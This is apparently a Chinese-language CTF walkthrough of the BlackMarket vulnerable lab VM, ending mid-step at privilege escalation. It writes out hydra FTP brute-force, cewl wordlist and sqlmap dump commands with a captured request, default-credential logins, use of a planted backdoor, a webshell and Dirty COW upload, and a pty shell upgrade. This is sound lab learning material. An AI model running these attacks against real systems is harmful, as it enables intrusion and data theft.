算是一次小打小闹的渗透测试了,学到的东西果然不少!
(冒着挂科的危险,仍然要做渗透,这就是所谓的爱吧!)
BlackMarket官方定义渗透难度为中低等,我直接把靶机给大家共享下:
链接:https://pan.baidu.com/s/1RNmd2eVXc6oiChK0nunbMA
密码:qqx2
下面来说一下我的实验环境
win10 x64
VM
靶机ip: 192.168.58.1
主机与虚拟机之间可以Ping通,开始实验
首先在地址栏中输入靶机ip,发现访问被拒绝
就需要考虑同段(C段)ip有哪些可以扫描到
可以发现有两台另外的机器,进行连接192.168.58.254,无法连接
然后在探测192.168.58.139开放了哪些端口
常识ftp登陆,当然是要输入账号密码的,试了几个简单的都不行,就需要规规矩矩的找密码了。
查看网页源代码,最下面有这个
flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}
base64解密
flag1{CIA - Operation Treadstone}
然后直接google这个
可以看到第一条就是这个网站
http://bourne.wikia.com/wiki/Operation_Treadstone
然后使用cewl来爬取网站并生成字典
命令如下
cewl -d -m -w /root/Desktop/list.txt http://bourne.wikia.com/wiki/Operation_Treadstone
然后暴力破解ftp
可以使用python脚本写一个(https://www.jianshu.com/p/e01bcbb67c1a改进)
也可以使用hydra爆破ftp
hydra -L /root/Desktop/name.txt -P /root/Desktop/list.txt ftp://192.168.58.139
tips:这个爆破应该是需要好久时间的,不过这个只是时间问题
这里只提供一个思路,一般的话还是得爆好久
可以爆破出来,或者在最后一步提权成功之后直接查看也是可以的
这里直接采用正确的账号密码了
ftp登陆:nicky CIA
然后可以看到里面有个txt文件,文件内容为
flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!
尝试扫描一波后台路径
tips:向这种交易网站后台路径就直接google交易网站后台路径字典
dirbuster也是比较好用的
然后就可以扫到supplier目录
然后就用supplier supplier登陆进去(比较容易想到)
然后直接转到路径admin,发现可以进去
http://192.168.58.139/admin/
然后修改Customer的信息
tips:发现supplier的权限不是一般的大啊
可以修改好多
而且id随着用户的增加越来越大,这就比较容易想到admin的id为1
然后用admin/admin就可以登录进去
题目的意思就是让我们找到Jason Bourne Email ,这种东西一般在哪里呢?
很容易想到应该是在数据库里,而且一般很有可能出现的地方与数据库打交道的地方
sqlmap一把梭
sqlmap -r /root/Desktop/request.txt --level 5 --dbs
BlackMarket
sqlmap -r /root/Desktop/request.txt --level 5 -D BlackMarket --tables
Flag
sqlmap -r /root/Desktop/request.txt --level 5 -D BlackMarket -T Flag --dump
jbourne
request.txt
POST /admin/edit_customer.php?id=11 HTTP/1.1
Host: 192.168.58.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://192.168.58.139/admin/customer.php
Cookie: PHPSESSID=2b4vq62tsvb2l2u05404honjv2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 93
name=111111&address=1111&contact=1111&username=1111&password=b0baee9d279d34fa1dfd71aadb908c3f
上一个flag已经告诉我们密码为?????,根据扫到的目录
尝试http://192.168.58.139/squirrelmail/
然后jbourne ?????登陆进去
然后随便找找就能找到一样的东西
Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
HELLO Friend,
I have intercept the message from Russian's some how we are working on the same
direction, however, I couldn't able to decode the message.
<Message Begins>
Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl
KzhhKzhh.qkt rm liwvi gl szxp rm rg.
</end>
解密
Flag5{Everything is encrypted}
然后各种尝试,可以发现这个是古典置换密码,解密得到
https://www.quipqiup.com/
Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to PassPass.jpg in order to hack in it.
这里打破脑子也没有想到,这里需要flag2中的提示(也可以自己根据workshop fuzz一波)
flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!
然后这里的路径是vworkshop
然后把这个图片保存在本地,用notpad++打开,最后一行有一个密码,asciihex解密得到:HailKGB
那么后门的密码已经得到了,还需要一个后门地址,根据图片的提示(上一个flag也提示在这个目录下)就在这里附近,直接访问backdoor.php(也可以扫描,这里直接就提示backdoor了)
然后又到了打破脑子也想不到的地方了,不过心细的人可以发现这里有的问题
直接传入密码进入后台,就可以看到文件
flag6{Um9vdCB0aW1l} (也可以在这里找到flag2)
然后找个目录上传自己的马,我这里上传的是脏牛,我这里上传的目录是:
/var/www/html/
然后进行反弹shell:
然后输入
python -c 'import pty;pty.spawn("/bin/bash")'
电脑已经和那个服务器建立连接了
然后就是提取了,切换到那个目录下,然后运行牛
